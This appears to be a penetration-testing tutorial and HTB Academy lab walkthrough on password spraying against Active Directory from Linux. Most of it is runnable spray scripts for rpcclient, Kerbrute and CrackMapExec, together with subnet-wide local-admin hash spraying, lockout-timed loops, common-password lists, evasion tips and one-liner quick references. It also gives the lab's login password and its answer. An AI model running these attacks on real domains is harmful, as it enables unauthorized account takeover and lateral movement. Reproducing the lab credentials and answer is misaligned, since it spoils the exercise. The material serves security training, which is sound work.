π§Password Spraying from Linux
π Overview
Password spraying is one of the most effective methods for gaining initial domain credentials in Active Directory environments. This technique involves testing a small number of common passwords against a large list of usernames, staying below account lockout thresholds while maximizing the chance of success.
π― Attack Methodology
β οΈ Critical Prerequisites
Password Policy Knowledge: Essential for safe execution
Valid User List: Accurate username enumeration completed
Lockout Threshold: Must stay below the limit (typically 3-5 attempts)
Attack Timing: Space attempts based on lockout duration
π Attack Flow
User List Preparation: Clean, validated username list
Password Selection: Common, policy-compliant passwords
Attack Execution: Systematic credential testing
Success Validation: Verify discovered credentials
Documentation: Log all activities and results
π§ rpcclient Password Spraying
π Basic Methodology
Success Indicator:
Authority Namein responseBash One-Liner: Efficient automation approach
Filtering: Grep for successful authentications only
π Single Password Spray
# Basic rpcclient password spray
for u in $(cat valid_users.txt); do
rpcclient -U "$u%Welcome1" -c "getusername;quit" 172.16.5.5 | grep Authority
doneπ Example Successful Output
Account Name: tjohnson, Authority Name: INLANEFREIGHT
Account Name: sgage, Authority Name: INLANEFREIGHTπ§ Enhanced Script with Logging
#!/bin/bash
# Enhanced password spraying with logging
DC_IP="172.16.5.5"
USERLIST="valid_users.txt"
PASSWORD="Welcome1"
LOGFILE="spray_results_$(date +%Y%m%d_%H%M%S).log"
echo "[$(date)] Starting password spray against $DC_IP" | tee -a $LOGFILE
echo "[$(date)] Testing password: $PASSWORD" | tee -a $LOGFILE
for user in $(cat $USERLIST); do
echo "[$(date)] Testing user: $user" >> $LOGFILE
result=$(rpcclient -U "$user%$PASSWORD" -c "getusername;quit" $DC_IP 2>/dev/null)
if echo "$result" | grep -q "Authority"; then
echo "[SUCCESS] $user:$PASSWORD" | tee -a $LOGFILE
echo "$result" >> $LOGFILE
fi
done
echo "[$(date)] Password spray completed" | tee -a $LOGFILEπ« Kerbrute Password Spraying
β‘ Key Advantages
Speed: Fastest password spraying method
Stealth: Minimal event generation
Kerberos-Based: Uses native authentication protocol
Clear Output: Easy to identify successful logins
π Basic Kerbrute Spraying
# Single password spray
kerbrute passwordspray -d inlanefreight.local --dc 172.16.5.5 valid_users.txt Welcome1
# Save results to file
kerbrute passwordspray -d inlanefreight.local --dc 172.16.5.5 valid_users.txt Welcome1 -o spray_results.txt
# Verbose output
kerbrute passwordspray -d inlanefreight.local --dc 172.16.5.5 valid_users.txt Welcome1 -vπ Example Kerbrute Output
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (9cfb81e) - 02/17/22 - Ronnie Flathers @ropnop
2022/02/17 22:57:12 > Using KDC(s):
2022/02/17 22:57:12 > 172.16.5.5:88
2022/02/17 22:57:12 > [+] VALID LOGIN: sgage@inlanefreight.local:Welcome1
2022/02/17 22:57:12 > Done! Tested 57 logins (1 successes) in 0.172 secondsπ Multiple Password Spraying
#!/bin/bash
# Multiple password spray with delays
PASSWORDS=("Welcome1" "Password1" "Company123" "Spring2024")
USERLIST="valid_users.txt"
DOMAIN="inlanefreight.local"
DC="172.16.5.5"
DELAY=35 # Minutes between sprays (based on lockout policy)
for password in "${PASSWORDS[@]}"; do
echo "[$(date)] Testing password: $password"
kerbrute passwordspray -d $DOMAIN --dc $DC $USERLIST $password -o "spray_$password.txt"
# Check for successful logins
if grep -q "VALID LOGIN" "spray_$password.txt"; then
echo "[SUCCESS] Found valid credentials with password: $password"
grep "VALID LOGIN" "spray_$password.txt"
fi
# Wait between attempts (except for last password)
if [ "$password" != "${PASSWORDS[-1]}" ]; then
echo "[$(date)] Waiting $DELAY minutes before next spray..."
sleep ${DELAY}m
fi
doneπ¨ CrackMapExec Password Spraying
πͺ Key Features
SMB-Based: Uses SMB protocol for authentication
Bulk Testing: Efficient user list processing
Success Filtering: Easy identification of valid credentials
Immediate Validation: Built-in credential verification
π Basic CrackMapExec Spraying
# Single password against user list
crackmapexec smb 172.16.5.5 -u valid_users.txt -p Welcome1 | grep +
# Multiple passwords (one at a time)
crackmapexec smb 172.16.5.5 -u valid_users.txt -p Password123 | grep +π Example Successful Output
SMB 172.16.5.5 445 ACADEMY-EA-DC01 [+] INLANEFREIGHT.LOCAL\avazquez:Password123β
Credential Validation
# Validate discovered credentials
crackmapexec smb 172.16.5.5 -u avazquez -p Password123
# Expected output:
# SMB 172.16.5.5 445 ACADEMY-EA-DC01 [*] Windows 10.0 Build 17763 x64 (name:ACADEMY-EA-DC01) (domain:INLANEFREIGHT.LOCAL) (signing:True) (SMBv1:False)
# SMB 172.16.5.5 445 ACADEMY-EA-DC01 [+] INLANEFREIGHT.LOCAL\avazquez:Password123π§ Advanced CrackMapExec Script
#!/bin/bash
# Advanced CrackMapExec spraying with comprehensive logging
DC_IP="172.16.5.5"
USERLIST="valid_users.txt"
PASSWORDS=("Welcome1" "Password123" "Company2024")
LOGFILE="cme_spray_$(date +%Y%m%d_%H%M%S).log"
echo "[$(date)] Starting CrackMapExec password spray" | tee -a $LOGFILE
echo "[$(date)] Target: $DC_IP" | tee -a $LOGFILE
echo "[$(date)] User list: $USERLIST ($(wc -l < $USERLIST) users)" | tee -a $LOGFILE
for password in "${PASSWORDS[@]}"; do
echo "[$(date)] Testing password: $password" | tee -a $LOGFILE
# Run spray and capture results
result=$(crackmapexec smb $DC_IP -u $USERLIST -p "$password" 2>&1)
# Log full results
echo "$result" >> $LOGFILE
# Extract and display successes
successes=$(echo "$result" | grep '\[+\]')
if [ -n "$successes" ]; then
echo "[SUCCESS] Found valid credentials:" | tee -a $LOGFILE
echo "$successes" | tee -a $LOGFILE
# Validate each successful credential
echo "$successes" | while read -r line; do
user=$(echo "$line" | grep -oP '\\\\[^\\]+\\\\K[^:]+')
echo "[$(date)] Validating $user:$password" | tee -a $LOGFILE
crackmapexec smb $DC_IP -u "$user" -p "$password" | tee -a $LOGFILE
done
fi
echo "[$(date)] Completed testing password: $password" | tee -a $LOGFILE
echo "----------------------------------------" | tee -a $LOGFILE
doneπ Local Administrator Password Reuse
π― Attack Concept
Local administrator accounts often have the same password across multiple systems due to:
Gold Images: Automated deployments using templates
Management Ease: Admins using same password everywhere
Legacy Practices: Old password policies still in effect
π Target Prioritization
High-Value Servers: SQL, Exchange, file servers
Domain Controllers: If accessible (high impact)
Management Systems: SCCM, monitoring tools
Jump Boxes: Administrative workstations
π₯ Hash-Based Spraying
# Local admin hash spraying across subnet
crackmapexec smb --local-auth 172.16.5.0/23 -u administrator -H 88ad09182de639ccc6579eb0849751cf | grep +Example Output:
SMB 172.16.5.50 445 ACADEMY-EA-MX01 [+] ACADEMY-EA-MX01\administrator 88ad09182de639ccc6579eb0849751cf (Pwn3d!)
SMB 172.16.5.25 445 ACADEMY-EA-MS01 [+] ACADEMY-EA-MS01\administrator 88ad09182de639ccc6579eb0849751cf (Pwn3d!)
SMB 172.16.5.125 445 ACADEMY-EA-WEB0 [+] ACADEMY-EA-WEB0\administrator 88ad09182de639ccc6579eb0849751cf (Pwn3d!)π§ Comprehensive Local Admin Hunting
#!/bin/bash
# Hunt for local admin password reuse
HASH="88ad09182de639ccc6579eb0849751cf"
SUBNETS=("172.16.5.0/24" "172.16.4.0/24" "10.10.10.0/24")
ACCOUNTS=("administrator" "admin" "localadmin")
for subnet in "${SUBNETS[@]}"; do
echo "[$(date)] Testing subnet: $subnet"
for account in "${ACCOUNTS[@]}"; do
echo "[$(date)] Testing account: $account"
crackmapexec smb --local-auth $subnet -u $account -H $HASH --threads 50 | grep '\[+\]' | tee -a "local_admin_reuse.log"
done
doneβ οΈ Important Flags
--local-auth: Prevents domain account lockouts--threads: Controls connection speed-H: Uses NTLM hash instead of password
π― HTB Academy Lab Walkthrough
π Lab Question
"Find the user account starting with the letter 's' that has the password Welcome1. Submit the username as your answer."
π Step-by-Step Solution
1οΈβ£ Connect to Attack Host
# SSH to target
ssh htb-student@10.129.54.201
# Password: HTB_@cademy_stdnt!2οΈβ£ Gather User List with enum4linux
# Use enum4linux to gather usernames (exact HTB lab method)
enum4linux -U 172.16.5.5 | grep "user:" | cut -f2 -d"[" | cut -f1 -d"]" > validUsers.txt
# Verify the user list was created
cat validUsers.txt
wc -l validUsers.txt
# Alternative: If you have Kerbrute results from previous enumeration
# grep "VALID USERNAME" kerbrute_output.txt | awk '{print $4}' | cut -d'@' -f1 > valid_users.txt3οΈβ£ Method 1: rpcclient Password Spray
# Test Welcome1 password against all users
for u in $(cat validUsers.txt); do
rpcclient -U "$u%Welcome1" -c "getusername;quit" 172.16.5.5 | grep Authority
done4οΈβ£ Method 2: Kerbrute Password Spray (Recommended)
# Most reliable method - exactly as shown in HTB lab
kerbrute passwordspray -d inlanefreight.local --dc 172.16.5.5 validUsers.txt Welcome15οΈβ£ Method 3: CrackMapExec
# Alternative verification
crackmapexec smb 172.16.5.5 -u validUsers.txt -p Welcome1 | grep +6οΈβ£ Expected Results
Based on the lab content, you should see:
enum4linux output (userlist creation):
# validUsers.txt should contain usernames like:
administrator
guest
krbtgt
lab_adm
htb-student
sgage
avazquez
...Password spraying results:
# rpcclient output:
Account Name: sgage, Authority Name: INLANEFREIGHT
# Kerbrute output (exactly from HTB lab):
[!] lab_adm@inlanefreight.local:Welcome1 - KDC_Error: KDC has no support for encryption type
[+] VALID LOGIN: sgage@inlanefreight.local:Welcome1
Done! Tested 21 logins (1 successes) in 0.061 seconds
# CrackMapExec output:
[+] INLANEFREIGHT.LOCAL\sgage:Welcome1β
Answer: sgage
sgage7οΈβ£ Verification
# Verify the discovered credentials
crackmapexec smb 172.16.5.5 -u sgage -p Welcome1
# Should show successful authenticationπ Tool Comparison
Tool
Speed
Stealth
Accuracy
Features
Best Use Case
rpcclient
Medium
Medium
High
Simple, reliable
Script automation
Kerbrute
Fast
High
High
Kerberos-based, minimal logs
Large-scale spraying
CrackMapExec
Medium
Low
High
Validation, local auth
Comprehensive testing
π‘οΈ Security Considerations
π¨ Event Generation
Tool
Event IDs Generated
Detection Risk
rpcclient
4625 (failures), 4624 (success)
Medium
Kerbrute
4768 (TGT requests), 4771 (Pre-auth failed)
Low
CrackMapExec
4625 (failures), 4624 (success), 4648 (explicit logon)
High
π Defense Evasion
Timing: Space attempts based on lockout policy
User Selection: Avoid high-privilege accounts initially
Password Selection: Use policy-compliant passwords
Monitoring: Watch for defensive responses
π Detection Indicators
Multiple authentication failures from single source
Sequential login attempts across user list
Unusual authentication timing (outside business hours)
High volume of Event ID 4625 in short timeframe
π Password Selection Strategy
π― Common Effective Passwords
# Season + Year + Complexity
Spring2024!
Summer2024!
Fall2024!
Winter2024!
# Company + Variations
CompanyName1
CompanyName123
CompanyName2024!
# Standard Weak Passwords
Welcome1
Password1
Password123
Admin123π Password Policy Compliance
# For 8-character minimum, complexity enabled:
- Minimum 8 characters
- 3 out of 4 character types:
- Uppercase letter
- Lowercase letter
- Number
- Special character
# Examples that meet typical policy:
Welcome1 # W(upper) + elcome(lower) + 1(number) = 3/4 types β
Password1 # P(upper) + assword(lower) + 1(number) = 3/4 types β
Company! # C(upper) + ompany(lower) + !(special) = 3/4 types βπ Attack Documentation Template
π Spray Session Log
Date: 2024-01-15
Time: 14:30:00 UTC
Method: Kerbrute Password Spray
Target DC: 172.16.5.5
Domain: inlanefreight.local
User List: valid_users.txt (57 users)
Password Tested: Welcome1
Results: 1 success (sgage:Welcome1)
Duration: 0.172 seconds
Event Risk: Low (Kerberos-based)π― Success Tracking
# Create success log
echo "Username:Password:Method:Timestamp" > successful_logins.log
echo "sgage:Welcome1:Kerbrute:$(date)" >> successful_logins.log
# Validate all successes
while IFS=: read -r user pass method timestamp; do
if [ "$user" != "Username" ]; then
echo "Validating $user:$pass"
crackmapexec smb 172.16.5.5 -u "$user" -p "$pass"
fi
done < successful_logins.logβ‘ Quick Reference Commands
π§ One-Liner Sprays
# enum4linux user enumeration (HTB method)
enum4linux -U DC_IP | grep "user:" | cut -f2 -d"[" | cut -f1 -d"]" > validUsers.txt
# rpcclient one-liner
for u in $(cat validUsers.txt); do rpcclient -U "$u%PASSWORD" -c "getusername;quit" DC_IP | grep Authority; done
# Kerbrute spray (most effective)
kerbrute passwordspray -d domain.local --dc DC_IP validUsers.txt PASSWORD
# CrackMapExec spray
crackmapexec smb DC_IP -u validUsers.txt -p PASSWORD | grep +
# Local admin hash spray
crackmapexec smb --local-auth SUBNET -u administrator -H HASH | grep +π Result Extraction
# Extract usernames from successful sprays
grep "VALID LOGIN" kerbrute_output.txt | awk '{print $4}' | cut -d'@' -f1
# Extract from CrackMapExec
grep '\[+\]' cme_output.txt | grep -oP '\\\\[^\\]+\\\\K[^:]+'
# Extract from rpcclient
grep "Authority Name" rpc_output.txt | awk '{print $3}' | cut -d',' -f1π Key Takeaways
β
Attack Best Practices
Know the Policy: Essential for safe execution
Multiple Tools: Use different methods for verification
Proper Timing: Space attempts to avoid lockouts
Documentation: Log everything for client reporting
β οΈ Critical Warnings
Never Exceed Lockout Threshold: Typically 3-5 attempts max
Monitor Bad Password Counts: Check account status before spraying
Avoid High-Value Accounts: Don't target admin accounts initially
Space Attempts: Wait lockout duration + buffer between sprays
π― Post-Success Actions
Immediate Validation: Verify all discovered credentials
Privilege Assessment: Check user permissions and group memberships
Access Expansion: Use credentials for further enumeration
Documentation: Record all findings for reporting
Password spraying success requires patience, methodology, and respect for account lockout policies - one successful credential can open the entire domain.
Last updated